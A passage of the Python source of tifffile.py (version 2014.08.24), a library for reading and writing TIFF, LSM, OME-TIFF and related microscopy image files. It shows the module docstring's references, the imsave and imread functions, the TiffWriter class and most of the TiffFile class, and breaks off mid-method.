PackBits and LZW encoded strings) Notes ----- The API is not stable yet and might change between revisions. Tested on little-endian platforms only. 
Other Python packages and modules for reading bio-scientific TIFF files: * `Imread <http://luispedro.org/software/imread>`_ * `PyLibTiff <http://code.google.com/p/pylibtiff>`_ * `SimpleITK <http://www.simpleitk.org>`_ * `PyLSM <https://launchpad.net/pylsm>`_ * `PyMca.TiffIO.py <http://pymca.sourceforge.net/>`_ (same as fabio.TiffIO) * `BioImageXD.Readers <http://www.bioimagexd.net/>`_ * `Cellcognition.io <http://cellcognition.org/>`_ * `CellProfiler.bioformats <https://github.com/CellProfiler/python-bioformats>`_ Acknowledgements ---------------- * Egor Zindy, University of Manchester, for cz_lsm_scan_info specifics. * Wim Lewis for a bug fix and some read_cz_lsm functions. * Hadrien Mary for help on reading MicroManager files. References ---------- (1) TIFF 6.0 Specification and Supplements. Adobe Systems Incorporated. http://partners.adobe.com/public/developer/tiff/ (2) TIFF File Format FAQ. http://www.awaresystems.be/imaging/tiff/faq.html (3) MetaMorph Stack (STK) Image File Format. http://support.meta.moleculardevices.com/docs/t10243.pdf (4) Image File Format Description LSM 5/7 Release 6.0 (ZEN 2010). Carl Zeiss MicroImaging GmbH. BioSciences. May 10, 2011 (5) File Format Description - LSM 5xx Release 2.0. http://ibb.gsf.de/homepage/karsten.rodenacker/IDL/Lsmfile.doc (6) The OME-TIFF format. http://www.openmicroscopy.org/site/support/file-formats/ome-tiff (7) UltraQuant(r) Version 6.0 for Windows Start-Up Guide. http://www.ultralum.com/images%20ultralum/pdf/UQStart%20Up%20Guide.pdf (8) Micro-Manager File Formats. http://www.micro-manager.org/wiki/Micro-Manager_File_Formats (9) Tags for TIFF and Related Specifications. Digital Preservation. http://www.digitalpreservation.gov/formats/content/tiff_tags.shtml Examples -------- >>> data = numpy.random.rand(5, 301, 219) >>> imsave('temp.tif', data) >>> image = imread('temp.tif') >>> numpy.testing.assert_array_equal(image, data) >>> with TiffFile('temp.tif') as tif: ... images = tif.asarray() ... for page in tif: ... for tag in page.tags.values(): ... t = tag.name, tag.value ... image = page.asarray() """ from __future__ import division, print_function import sys import os import re import glob import math import zlib import time import json import struct import warnings import tempfile import datetime import collections from fractions import Fraction from xml.etree import cElementTree as etree import numpy # try: # import _tifffile # except ImportError: # warnings.warn( # "failed to import the optional _tifffile C extension module.\n" # "Loading of some compressed images will be slow.\n" # "Tifffile.c can be obtained at http://www.lfd.uci.edu/~gohlke/") __version__ = '2014.08.24' __docformat__ = 'restructuredtext en' __all__ = ('imsave', 'imread', 'imshow', 'TiffFile', 'TiffWriter', 'TiffSequence') def imsave(filename, data, **kwargs): """Write image data to TIFF file. Refer to the TiffWriter class and member functions for documentation. Parameters ---------- filename : str Name of file to write. data : array_like Input image. The last dimensions are assumed to be image depth, height, width, and samples. kwargs : dict Parameters 'byteorder', 'bigtiff', and 'software' are passed to the TiffWriter class. Parameters 'photometric', 'planarconfig', 'resolution', 'description', 'compress', 'volume', and 'extratags' are passed to the TiffWriter.save function. Examples -------- >>> data = numpy.random.rand(2, 5, 3, 301, 219) >>> description = u'{"shape": %s}' % str(list(data.shape)) >>> imsave('temp.tif', data, compress=6, ... 
extratags=[(270, 's', 0, description, True)]) """ tifargs = {} for key in ('byteorder', 'bigtiff', 'software', 'writeshape'): if key in kwargs: tifargs[key] = kwargs[key] del kwargs[key] if 'writeshape' not in kwargs: kwargs['writeshape'] = True if 'bigtiff' not in tifargs and data.size*data.dtype.itemsize > 2000*2**20: tifargs['bigtiff'] = True with TiffWriter(filename, **tifargs) as tif: tif.save(data, **kwargs) class TiffWriter(object): """Write image data to TIFF file. TiffWriter instances must be closed using the close method, which is automatically called when using the 'with' statement. Examples -------- >>> data = numpy.random.rand(2, 5, 3, 301, 219) >>> with TiffWriter('temp.tif', bigtiff=True) as tif: ... for i in range(data.shape[0]): ... tif.save(data[i], compress=6) """ TYPES = {'B': 1, 's': 2, 'H': 3, 'I': 4, '2I': 5, 'b': 6, 'h': 8, 'i': 9, 'f': 11, 'd': 12, 'Q': 16, 'q': 17} TAGS = { 'new_subfile_type': 254, 'subfile_type': 255, 'image_width': 256, 'image_length': 257, 'bits_per_sample': 258, 'compression': 259, 'photometric': 262, 'fill_order': 266, 'document_name': 269, 'image_description': 270, 'strip_offsets': 273, 'orientation': 274, 'samples_per_pixel': 277, 'rows_per_strip': 278, 'strip_byte_counts': 279, 'x_resolution': 282, 'y_resolution': 283, 'planar_configuration': 284, 'page_name': 285, 'resolution_unit': 296, 'software': 305, 'datetime': 306, 'predictor': 317, 'color_map': 320, 'tile_width': 322, 'tile_length': 323, 'tile_offsets': 324, 'tile_byte_counts': 325, 'extra_samples': 338, 'sample_format': 339, 'image_depth': 32997, 'tile_depth': 32998} def __init__(self, filename, bigtiff=False, byteorder=None, software='tifffile.py'): """Create a new TIFF file for writing. Use bigtiff=True when creating files greater than 2 GB. Parameters ---------- filename : str Name of file to write. bigtiff : bool If True, the BigTIFF format is used. byteorder : {'<', '>'} The endianness of the data in the file. By default this is the system's native byte order. software : str Name of the software used to create the image. Saved with the first page only. """ if byteorder not in (None, '<', '>'): raise ValueError("invalid byteorder %s" % byteorder) if byteorder is None: byteorder = '<' if sys.byteorder == 'little' else '>' self._byteorder = byteorder self._software = software self._fh = open(filename, 'wb') self._fh.write({'<': b'II', '>': b'MM'}[byteorder]) if bigtiff: self._bigtiff = True self._offset_size = 8 self._tag_size = 20 self._numtag_format = 'Q' self._offset_format = 'Q' self._val_format = '8s' self._fh.write(struct.pack(byteorder+'HHH', 43, 8, 0)) else: self._bigtiff = False self._offset_size = 4 self._tag_size = 12 self._numtag_format = 'H' self._offset_format = 'I' self._val_format = '4s' self._fh.write(struct.pack(byteorder+'H', 42)) # first IFD self._ifd_offset = self._fh.tell() self._fh.write(struct.pack(byteorder+self._offset_format, 0)) def save(self, data, photometric=None, planarconfig=None, resolution=None, description=None, volume=False, writeshape=False, compress=0, extratags=()): """Write image data to TIFF file. Image data are written in one stripe per plane. Dimensions larger than 2 to 4 (depending on photometric mode, planar configuration, and SGI mode) are flattened and saved as separate pages. The 'sample_format' and 'bits_per_sample' TIFF tags are derived from the data type. Parameters ---------- data : array_like Input image. The last dimensions are assumed to be image depth, height, width, and samples. 
photometric : {'minisblack', 'miniswhite', 'rgb'} The color space of the image data. By default this setting is inferred from the data shape. planarconfig : {'contig', 'planar'} Specifies if samples are stored contiguous or in separate planes. By default this setting is inferred from the data shape. 'contig': last dimension contains samples. 'planar': third last dimension contains samples. resolution : (float, float) or ((int, int), (int, int)) X and Y resolution in dots per inch as float or rational numbers. description : str The subject of the image. Saved with the first page only. compress : int Values from 0 to 9 controlling the level of zlib compression. If 0, data are written uncompressed (default). volume : bool If True, volume data are stored in one tile (if applicable) using the SGI image_depth and tile_depth tags. Image width and depth must be multiple of 16. Few software can read this format, e.g. MeVisLab. writeshape : bool If True, write the data shape to the image_description tag if necessary and no other description is given. extratags: sequence of tuples Additional tags as [(code, dtype, count, value, writeonce)]. code : int The TIFF tag Id. dtype : str Data type of items in 'value' in Python struct format. One of B, s, H, I, 2I, b, h, i, f, d, Q, or q. count : int Number of data values. Not used for string values. value : sequence 'Count' values compatible with 'dtype'. writeonce : bool If True, the tag is written to the first page only. """ if photometric not in (None, 'minisblack', 'miniswhite', 'rgb'): raise ValueError("invalid photometric %s" % photometric) if planarconfig not in (None, 'contig', 'planar'): raise ValueError("invalid planarconfig %s" % planarconfig) if not 0 <= compress <= 9: raise ValueError("invalid compression level %s" % compress) fh = self._fh byteorder = self._byteorder numtag_format = self._numtag_format val_format = self._val_format offset_format = self._offset_format offset_size = self._offset_size tag_size = self._tag_size data = numpy.asarray(data, dtype=byteorder+data.dtype.char, order='C') data_shape = shape = data.shape data = numpy.atleast_2d(data) # normalize shape of data samplesperpixel = 1 extrasamples = 0 if volume and data.ndim < 3: volume = False if photometric is None: if planarconfig: photometric = 'rgb' elif data.ndim > 2 and shape[-1] in (3, 4): photometric = 'rgb' elif volume and data.ndim > 3 and shape[-4] in (3, 4): photometric = 'rgb' elif data.ndim > 2 and shape[-3] in (3, 4): photometric = 'rgb' else: photometric = 'minisblack' if planarconfig and len(shape) <= (3 if volume else 2): planarconfig = None photometric = 'minisblack' if photometric == 'rgb': if len(shape) < 3: raise ValueError("not a RGB(A) image") if len(shape) < 4: volume = False if planarconfig is None: if shape[-1] in (3, 4): planarconfig = 'contig' elif shape[-4 if volume else -3] in (3, 4): planarconfig = 'planar' elif shape[-1] > shape[-4 if volume else -3]: planarconfig = 'planar' else: planarconfig = 'contig' if planarconfig == 'contig': data = data.reshape((-1, 1) + shape[(-4 if volume else -3):]) samplesperpixel = data.shape[-1] else: data = data.reshape( (-1,) + shape[(-4 if volume else -3):] + (1,)) samplesperpixel = data.shape[1] if samplesperpixel > 3: extrasamples = samplesperpixel - 3 elif planarconfig and len(shape) > (3 if volume else 2): if planarconfig == 'contig': data = data.reshape((-1, 1) + shape[(-4 if volume else -3):]) samplesperpixel = data.shape[-1] else: data = data.reshape( (-1,) + shape[(-4 if volume else -3):] + (1,)) 
samplesperpixel = data.shape[1] extrasamples = samplesperpixel - 1 else: planarconfig = None # remove trailing 1s while len(shape) > 2 and shape[-1] == 1: shape = shape[:-1] if len(shape) < 3: volume = False if False and ( len(shape) > (3 if volume else 2) and shape[-1] < 5 and all(shape[-1] < i for i in shape[(-4 if volume else -3):-1])): # DISABLED: non-standard TIFF, e.g. (220, 320, 2) planarconfig = 'contig' samplesperpixel = shape[-1] data = data.reshape((-1, 1) + shape[(-4 if volume else -3):]) else: data = data.reshape( (-1, 1) + shape[(-3 if volume else -2):] + (1,)) if samplesperpixel == 2: warnings.warn("writing non-standard TIFF (samplesperpixel 2)") if volume and (data.shape[-2] % 16 or data.shape[-3] % 16): warnings.warn("volume width or length are not multiple of 16") volume = False data = numpy.swapaxes(data, 1, 2) data = data.reshape( (data.shape[0] * data.shape[1],) + data.shape[2:]) # data.shape is now normalized 5D or 6D, depending on volume # (pages, planar_samples, (depth,) height, width, contig_samples) assert len(data.shape) in (5, 6) shape = data.shape bytestr = bytes if sys.version[0] == '2' else ( lambda x: bytes(x, 'utf-8') if isinstance(x, str) else x) tags = [] # list of (code, ifdentry, ifdvalue, writeonce) if volume: # use tiles to save volume data tag_byte_counts = TiffWriter.TAGS['tile_byte_counts'] tag_offsets = TiffWriter.TAGS['tile_offsets'] else: # else use strips tag_byte_counts = TiffWriter.TAGS['strip_byte_counts'] tag_offsets = TiffWriter.TAGS['strip_offsets'] def pack(fmt, *val): return struct.pack(byteorder+fmt, *val) def addtag(code, dtype, count, value, writeonce=False): # Compute ifdentry & ifdvalue bytes from code, dtype, count, value. # Append (code, ifdentry, ifdvalue, writeonce) to tags list. code = int(TiffWriter.TAGS.get(code, code)) try: tifftype = TiffWriter.TYPES[dtype] except KeyError: raise ValueError("unknown dtype %s" % dtype) rawcount = count if dtype == 's': value = bytestr(value) + b'\0' count = rawcount = len(value) value = (value, ) if len(dtype) > 1: count *= int(dtype[:-1]) dtype = dtype[-1] ifdentry = [pack('HH', code, tifftype), pack(offset_format, rawcount)] ifdvalue = None if count == 1: if isinstance(value, (tuple, list)): value = value[0] ifdentry.append(pack(val_format, pack(dtype, value))) elif struct.calcsize(dtype) * count <= offset_size: ifdentry.append(pack(val_format, pack(str(count)+dtype, *value))) else: ifdentry.append(pack(offset_format, 0)) ifdvalue = pack(str(count)+dtype, *value) tags.append((code, b''.join(ifdentry), ifdvalue, writeonce)) def rational(arg, max_denominator=1000000): # return nominator and denominator from float or two integers try: f = Fraction.from_float(arg) except TypeError: f = Fraction(arg[0], arg[1]) f = f.limit_denominator(max_denominator) return f.numerator, f.denominator if self._software: addtag('software', 's', 0, self._software, writeonce=True) self._software = None # only save to first page if description: addtag('image_description', 's', 0, description, writeonce=True) elif writeshape and shape[0] > 1 and shape != data_shape: addtag('image_description', 's', 0, "shape=(%s)" % (",".join('%i' % i for i in data_shape)), writeonce=True) addtag('datetime', 's', 0, datetime.datetime.now().strftime("%Y:%m:%d %H:%M:%S"), writeonce=True) addtag('compression', 'H', 1, 32946 if compress else 1) addtag('orientation', 'H', 1, 1) addtag('image_width', 'I', 1, shape[-2]) addtag('image_length', 'I', 1, shape[-3]) if volume: addtag('image_depth', 'I', 1, shape[-4]) addtag('tile_depth', 'I', 
1, shape[-4]) addtag('tile_width', 'I', 1, shape[-2]) addtag('tile_length', 'I', 1, shape[-3]) addtag('new_subfile_type', 'I', 1, 0 if shape[0] == 1 else 2) addtag('sample_format', 'H', 1, {'u': 1, 'i': 2, 'f': 3, 'c': 6}[data.dtype.kind]) addtag('photometric', 'H', 1, {'miniswhite': 0, 'minisblack': 1, 'rgb': 2}[photometric]) addtag('samples_per_pixel', 'H', 1, samplesperpixel) if planarconfig and samplesperpixel > 1: addtag('planar_configuration', 'H', 1, 1 if planarconfig == 'contig' else 2) addtag('bits_per_sample', 'H', samplesperpixel, (data.dtype.itemsize * 8, ) * samplesperpixel) else: addtag('bits_per_sample', 'H', 1, data.dtype.itemsize * 8) if extrasamples: if photometric == 'rgb' and extrasamples == 1: addtag('extra_samples', 'H', 1, 1) # associated alpha channel else: addtag('extra_samples', 'H', extrasamples, (0,) * extrasamples) if resolution: addtag('x_resolution', '2I', 1, rational(resolution[0])) addtag('y_resolution', '2I', 1, rational(resolution[1])) addtag('resolution_unit', 'H', 1, 2) addtag('rows_per_strip', 'I', 1, shape[-3] * (shape[-4] if volume else 1)) # use one strip or tile per plane strip_byte_counts = (data[0, 0].size * data.dtype.itemsize,) * shape[1] addtag(tag_byte_counts, offset_format, shape[1], strip_byte_counts) addtag(tag_offsets, offset_format, shape[1], (0, ) * shape[1]) # add extra tags from users for t in extratags: addtag(*t) # the entries in an IFD must be sorted in ascending order by tag code tags = sorted(tags, key=lambda x: x[0]) if not self._bigtiff and (fh.tell() + data.size*data.dtype.itemsize > 2**31-1): raise ValueError("data too large for non-bigtiff file") for pageindex in range(shape[0]): # update pointer at ifd_offset pos = fh.tell() fh.seek(self._ifd_offset) fh.write(pack(offset_format, pos)) fh.seek(pos) # write ifdentries fh.write(pack(numtag_format, len(tags))) tag_offset = fh.tell() fh.write(b''.join(t[1] for t in tags)) self._ifd_offset = fh.tell() fh.write(pack(offset_format, 0)) # offset to next IFD # write tag values and patch offsets in ifdentries, if necessary for tagindex, tag in enumerate(tags): if tag[2]: pos = fh.tell() fh.seek(tag_offset + tagindex*tag_size + offset_size + 4) fh.write(pack(offset_format, pos)) fh.seek(pos) if tag[0] == tag_offsets: strip_offsets_offset = pos elif tag[0] == tag_byte_counts: strip_byte_counts_offset = pos fh.write(tag[2]) # write image data data_offset = fh.tell() if compress: strip_byte_counts = [] for plane in data[pageindex]: plane = zlib.compress(plane, compress) strip_byte_counts.append(len(plane)) fh.write(plane) else: # if this fails try update Python/numpy data[pageindex].tofile(fh) fh.flush() # update strip and tile offsets and byte_counts if necessary pos = fh.tell() for tagindex, tag in enumerate(tags): if tag[0] == tag_offsets: # strip or tile offsets if tag[2]: fh.seek(strip_offsets_offset) strip_offset = data_offset for size in strip_byte_counts: fh.write(pack(offset_format, strip_offset)) strip_offset += size else: fh.seek(tag_offset + tagindex*tag_size + offset_size + 4) fh.write(pack(offset_format, data_offset)) elif tag[0] == tag_byte_counts: # strip or tile byte_counts if compress: if tag[2]: fh.seek(strip_byte_counts_offset) for size in strip_byte_counts: fh.write(pack(offset_format, size)) else: fh.seek(tag_offset + tagindex*tag_size + offset_size + 4) fh.write(pack(offset_format, strip_byte_counts[0])) break fh.seek(pos) fh.flush() # remove tags that should be written only once if pageindex == 0: tags = [t for t in tags if not t[-1]] def close(self): 
self._fh.close() def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.close() def imread(files, **kwargs): """Return image data from TIFF file(s) as numpy array. The first image series is returned if no arguments are provided. Parameters ---------- files : str or list File name, glob pattern, or list of file names. key : int, slice, or sequence of page indices Defines which pages to return as array. series : int Defines which series of pages in file to return as array. multifile : bool If True (default), OME-TIFF data may include pages from multiple files. pattern : str Regular expression pattern that matches axes names and indices in file names. kwargs : dict Additional parameters passed to the TiffFile or TiffSequence asarray function. Examples -------- >>> im = imread('test.tif', key=0) >>> im.shape (256, 256, 4) >>> ims = imread(['test.tif', 'test.tif']) >>> ims.shape (2, 256, 256, 4) """ kwargs_file = {} if 'multifile' in kwargs: kwargs_file['multifile'] = kwargs['multifile'] del kwargs['multifile'] else: kwargs_file['multifile'] = True kwargs_seq = {} if 'pattern' in kwargs: kwargs_seq['pattern'] = kwargs['pattern'] del kwargs['pattern'] if isinstance(files, basestring) and any(i in files for i in '?*'): files = glob.glob(files) if not files: raise ValueError('no files found') if len(files) == 1: files = files[0] if isinstance(files, basestring): with TiffFile(files, **kwargs_file) as tif: return tif.asarray(**kwargs) else: with TiffSequence(files, **kwargs_seq) as imseq: return imseq.asarray(**kwargs) class lazyattr(object): """Lazy object attribute whose value is computed on first access.""" __slots__ = ('func', ) def __init__(self, func): self.func = func def __get__(self, instance, owner): if instance is None: return self value = self.func(instance) if value is NotImplemented: return getattr(super(owner, instance), self.func.__name__) setattr(instance, self.func.__name__, value) return value class TiffFile(object): """Read image and metadata from TIFF, STK, LSM, and FluoView files. TiffFile instances must be closed using the close method, which is automatically called when using the 'with' statement. Attributes ---------- pages : list All TIFF pages in file. series : list of Records(shape, dtype, axes, TiffPages) TIFF pages with compatible shapes and types. micromanager_metadata: dict Extra MicroManager non-TIFF metadata in the file, if exists. All attributes are read-only. Examples -------- >>> with TiffFile('test.tif') as tif: ... data = tif.asarray() ... data.shape (256, 256, 4) """ def __init__(self, arg, name=None, offset=None, size=None, multifile=True, multifile_close=True): """Initialize instance from file. Parameters ---------- arg : str or open file Name of file or open file object. The file objects are closed in TiffFile.close(). name : str Optional name of file in case 'arg' is a file handle. offset : int Optional start position of embedded file. By default this is the current file position. size : int Optional size of embedded file. By default this is the number of bytes from the 'offset' to the end of the file. multifile : bool If True (default), series may include pages from multiple files. Currently applies to OME-TIFF only. multifile_close : bool If True (default), keep the handles of other files in multifile series closed. This is inefficient when few files refer to many pages. If False, the C runtime may run out of resources. 
""" self._fh = FileHandle(arg, name=name, offset=offset, size=size) self.offset_size = None self.pages = [] self._multifile = bool(multifile) self._multifile_close = bool(multifile_close) self._files = {self._fh.name: self} # cache of TiffFiles try: self._fromfile() except Exception: self._fh.close() raise @property def filehandle(self): """Return file handle.""" return self._fh @property def filename(self): """Return name of file handle.""" return self._fh.name def close(self): """Close open file handle(s).""" for tif in self._files.values(): tif._fh.close() self._files = {} def _fromfile(self): """Read TIFF header and all page records from file.""" self._fh.seek(0) try: self.byteorder = {b'II': '<', b'MM': '>'}[self._fh.read(2)] except KeyError: raise ValueError("not a valid TIFF file") version = struct.unpack(self.byteorder+'H', self._fh.read(2))[0] if version == 43: # BigTiff self.offset_size, zero = struct.unpack(self.byteorder+'HH', self._fh.read(4)) if zero or self.offset_size != 8: raise ValueError("not a valid BigTIFF file") elif version == 42: self.offset_size = 4 else: raise ValueError("not a TIFF file") self.pages = [] while True: try: page = TiffPage(self) self.pages.append(page) except StopIteration: break if not self.pages: raise ValueError("empty TIFF file") if self.is_micromanager: # MicroManager files contain metadata not stored in TIFF tags. self.micromanager_metadata = read_micromanager_metadata(self._fh) if self.is_lsm: self._fix_lsm_strip_offsets() self._fix_lsm_strip_byte_counts() def _fix_lsm_strip_offsets(self): """Unwrap strip offsets for LSM files greater than 4 GB.""" for series in self.series: wrap = 0 previous_offset = 0 for page in series.pages: strip_offsets = [] for current_offset in page.strip_offsets: if current_offset < previous_offset: wrap += 2**32 strip_offsets.append(current_offset + wrap) previous_offset = current_offset page.strip_offsets = tuple(strip_offsets) def _fix_lsm_strip_byte_counts(self): """Set strip_byte_counts to size of compressed data. The strip_byte_counts tag in LSM files contains the number of bytes for the uncompressed data. 
""" if not self.pages: return strips = {} for page in self.pages: assert len(page.strip_offsets) == len(page.strip_byte_counts) for offset, bytecount in zip(page.strip_offsets, page.strip_byte_counts): strips[offset] = bytecount offsets = sorted(strips.keys()) offsets.append(min(offsets[-1] + strips[offsets[-1]], self._fh.size)) for i, offset in enumerate(offsets[:-1]): strips[offset] = min(strips[offset], offsets[i+1] - offset) for page in self.pages: if page.compression: page.strip_byte_counts = tuple( strips[offset] for offset in page.strip_offsets) @lazyattr def series(self): """Return series of TiffPage with compatible shape and properties.""" if not self.pages: return [] series = [] page0 = self.pages[0] if self.is_ome: series = self._omeseries() elif self.is_fluoview: dims = {b'X': 'X', b'Y': 'Y', b'Z': 'Z', b'T': 'T', b'WAVELENGTH': 'C', b'TIME': 'T', b'XY': 'R', b'EVENT': 'V', b'EXPOSURE': 'L'} mmhd = list(reversed(page0.mm_header.dimensions)) series = [Record( axes=''.join(dims.get(i[0].strip().upper(), 'Q') for i in mmhd if i[1] > 1), shape=tuple(int(i[1]) for i in mmhd if i[1] > 1), pages=self.pages, dtype=numpy.dtype(page0.dtype))] elif self.is_lsm: lsmi = page0.cz_lsm_info axes = CZ_SCAN_TYPES[lsmi.scan_type] if page0.is_rgb: axes = axes.replace('C', '').replace('XY', 'XYC') axes = axes[::-1] shape = tuple(getattr(lsmi, CZ_DIMENSIONS[i]) for i in axes) pages = [p for p in self.pages if not p.is_reduced] series = [Record(axes=axes, shape=shape, pages=pages, dtype=numpy.dtype(pages[0].dtype))] if len(pages) != len(self.pages): # reduced RGB pages pages = [p for p in self.pages if p.is_reduced] cp = 1 i = 0 while cp < len(pages) and i < len(shape)-2: cp *= shape[i] i += 1 shape = shape[:i] + pages[0].shape axes = axes[:i] + 'CYX' series.append(Record(axes=axes, shape=shape, pages=pages, dtype=numpy.dtype(pages[0].dtype))) elif self.is_imagej: shape = [] axes = [] ij = page0.imagej_tags if 'frames' in ij: shape.append(ij['frames']) axes.append('T') if 'slices' in ij: shape.append(ij['slices']) axes.append('Z') if 'channels' in ij and not self.is_rgb: shape.append(ij['channels']) axes.append('C') remain = len(self.pages) // (product(shape) if shape else 1) if remain > 1: shape.append(remain) axes.append('I') shape.extend(page0.shape) axes.extend(page0.axes) axes = ''.join(axes) series = [Record(pages=self.pages, shape=tuple(shape), axes=axes, dtype=numpy.dtype(page0.dtype))] elif self.is_nih: if len(self.pages) == 1: shape = page0.shape axes = page0.axes else: shape = (len(self.pages),) + page0.shape axes = 'I' + page0.axes series = [Record(pages=self.pages, shape=shape, axes=axes, dtype=numpy.dtype(page0.dtype))] elif page0.is_shaped: # TODO: shaped files can contain multiple series shape = page0.tags['image_description'].value[7:-1] shape = tuple(int(i) for i in shape.split(b',')) series = [Record(pages=self.pages, shape=shape, axes='Q' * len(shape), dtype=numpy.dtype(page0.dtype))] # generic detection of series if not series: shapes = [] pages = {} for page in self.pages: if not page.shape: continue shape = page.shape + (page.axes, page.compression in TIFF_DECOMPESSORS) if shape not in pages: shapes.append(shape) pages[shape] = [page] else: pages[shape].append(page) series = [Record(pages=pages[s], axes=(('I' + s[-2]) if len(pages[s]) > 1 else s[-2]), dtype=numpy.dtype(pages[s][0].dtype), shape=((len(pages[s]), ) + s[:-2] if len(pages[s]) > 1 else s[:-2])) for s in shapes] # remove empty series, e.g. 
in MD Gel files series = [s for s in series if sum(s.shape) > 0] return series def asarray(self, key=None, series=None, memmap=False): """Return image data from multiple TIFF pages as numpy array. By default the first image series is returned. Parameters ---------- key : int, slice, or sequence of page indices Defines which pages to return as array. series : int Defines which series of pages to return as array. memmap : bool If True, return an array stored in a binary file on disk if possible. """ if key is None and series is None: series = 0 if series is not None: pages = self.series[series].pages else: pages = self.pages if key is None: pass elif isinstance(key, int): pages = [pages[key]] elif isinstance(key, slice): pages = pages[key] elif isinstance(key, collections.Iterable): pages = [pages[k] for k in key] else: raise TypeError("key must be an int, slice, or sequence") if not len(pages): raise ValueError("no pages selected") if self.is_nih: if pages[0].is_palette: result = stack_pages(pages, colormapped=False, squeeze=False) result = numpy.take(pages[0].color_map, result, axis=1) result = numpy.swapaxes(result, 0, 1) else: result = stack_pages(pages, memmap=memmap, colormapped=False, squeeze=False) elif len(pages) == 1: return pages[0].asarray(memmap=memmap) elif self.is_ome: assert not self.is_palette, "color mapping disabled for ome-tiff" if any(p is None for p in pages): # zero out missing pages firstpage = next(p for p in pages if p) nopage = numpy.zeros_like( firstpage.asarray(memmap=False)) s = self.series[series] if memmap: with tempfile.NamedTemporaryFile() as fh: result = numpy.memmap(fh, dtype=s.dtype, shape=s.shape) result = result.reshape(-1) else: result = numpy.empty(s.shape, s.dtype).reshape(-1) index = 0 class KeepOpen: # keep Tiff files open between consecutive pages def __init__(self, parent, close): self.master = parent self.parent = parent self._close = close def open(self, page): if self._close and page and page.parent != self.parent: if self.parent != self.master: self.parent.filehandle.close() self.parent = page.parent self.parent.filehandle.open() def close(self): if self._close and self.parent != self.master: self.parent.filehandle.close() keep = KeepOpen(self, self._multifile_close) for page in pages: keep.open(page) if page: a = page.asarray(memmap=False, colormapped=False, reopen=False) else: a = nopage try: result[index:index + a.size] = a.reshape(-1) except ValueError as e: warnings.warn("ome-tiff: %s" % e) break index += a.size keep.close() else: result = stack_pages(pages, memmap=memmap) if key is None: try: result.shape = self.series[series].shape except ValueError: try: warnings.warn("failed to reshape %s to %s" % ( result.shape, self.series[series].shape)) # try series of expected shapes result.shape = (-1,) + self.series[series].shape except ValueError: # revert to generic shape result.shape = (-1,) + pages[0].shape else: result.shape = (-1,) + pages[0].shape return result def _omeseries(self): """Return image series in OME-TIFF file(s).""" root = etree.fromstring(self.pages[0].tags['image_description'].value.decode(errors='ignore')) uuid = root.attrib.get('UUID', None) self._files = {uuid: self} dirname = self._fh.dirname modulo = {} result = [] for element in root: if element.tag.endswith('BinaryOnly'): warnings.warn("ome-xml: not an ome-tiff master file") break if element.tag.endswith('StructuredAnnotations'): for annot in element: if not annot.attrib.get('Namespace', '').endswith('modulo'): continue for value in annot: for modul in value: for 
along in modul: if not along.tag[:-1].endswith('Along'): continue axis = along.tag[-1] newaxis = along.attrib.get('Type', 'other') newaxis = AXES_LABELS[newaxis] if 'Start' in along.attrib: labels = range( int(along.attrib['Start']), int(along.attrib['End']) + 1, int(along.attrib.get('Step', 1))) else: labels = [label.text for label in along if label.tag.endswith('Label')] modulo[axis] = (newaxis, labels) if not element.tag.endswith('Image'): continue for pixels in element: if not pixels.tag.endswith('Pixels'): continue atr = pixels.attrib dtype = atr.get('Type', None) axes = ''.join(reversed(atr['DimensionOrder'])) shape = list(int(atr['Size'+ax]) for ax in axes) size = product(shape[:-2]) ifds = [None] * size for data in pixels: if not data.tag.endswith('TiffData'): continue atr = data.attrib ifd = int(atr.get('IFD', 0)) num = int(atr.get('NumPlanes', 1 if 'IFD' in atr else 0)) num = int(atr.get('PlaneCount', num)) idx = [int(atr.get('First'+ax, 0)) for ax in axes[:-2]] try: idx = numpy.ravel_multi_index(idx, shape[:-2]) except ValueError: # ImageJ produces invalid ome-xml when cropping warnings.warn("ome-xml: invalid TiffData index") continue for uuid in data: if not uuid.tag.endswith('UUID'): continue if uuid.text not in self._files: if not self._multifile: # abort reading multifile OME series # and fall back to generic series return [] fname = uuid.attrib['FileName'] try: tif = TiffFile(os.path.join(dirname, fname)) except (IOError, ValueError): tif.close() warnings.warn( "ome-xml: failed to read '%s'" % fname) break self._files[uuid.text] = tif if self._multifile_close: tif.close() pages = self._files[uuid.text].pages try: for i in range(num if num else len(pages)): ifds[idx + i] = pages[ifd + i] except IndexError: warnings.warn("ome-xml: index out of range") # only process first uuid break else: pages = self.pages try: for i in range(num if num else len(pages)): ifds[idx + i] = pages[ifd + i] except IndexError: warnings.warn("ome-xml: index out of range") if all(i is None for i in ifds): # skip images without data continue dtype = next(i for i in ifds if i).dtype result.append(Record(axes=axes, shape=shape, pages=ifds, dtype=numpy.dtype(dtype))) for record in result: for axis, (newaxis, labels) in modulo.items(): i = record.axes.index(axis) size = len(labels) if record.shape[i] == size: record.axes = record.axes.replace(axis, newaxis, 1) else: record.shape[i] //= size record.shape.insert(i+1, size) record.axes = record.axes.replace(axis, axis+newaxis, 1) record.shape = tuple(record.shape) # # squeeze dimensions # for record in result: # record.shape, record.axes = squeeze_axes(record.shape, record.axes) return result def __len__(self): """Return number of image pages in file.""" return len(self.pages) def __getitem__(self, key): """Return specified page.""" return self.pages[key] def __iter__(self): """Return iterator over pages.""" return iter(self.pages) def __str__(self): """Return string containing information about file.""" result = [ self._fh.name.capitalize(), format_size(self._fh.size), {'<': 'little endian', '>': 'big endian'}[self.byteorder]] if self.is_bigtiff: result.append("bigtiff") if len(self.pages) > 1: result.append("%i pages" % len(self.pages)) if len(self.series) > 1: result.append("%i series" % len(self.series)) if len(self._files) > 1: result.append("%i files" % (len(self._files))) return ", ".join(result) def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.close() @lazyattr def fstat(self): try: return 
